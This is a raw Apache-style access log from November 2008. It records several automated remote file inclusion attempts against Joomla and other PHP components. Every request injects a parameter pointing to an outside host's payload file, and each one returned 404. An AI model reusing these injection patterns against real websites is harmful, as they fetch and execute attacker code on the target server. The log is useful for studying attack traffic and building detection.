210.219.173.249 - - [03/Nov/2008:08:29:13 -0600] "GET /logs/access_log.1216684800//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:08:29:13 -0600] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:08:29:13 -0600] "GET /logs/access_log.1218672000//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
208.83.106.201 - - [03/Nov/2008:08:29:16 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
195.239.48.166 - - [03/Nov/2008:08:30:48 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:08:30:48 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:08:30:49 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
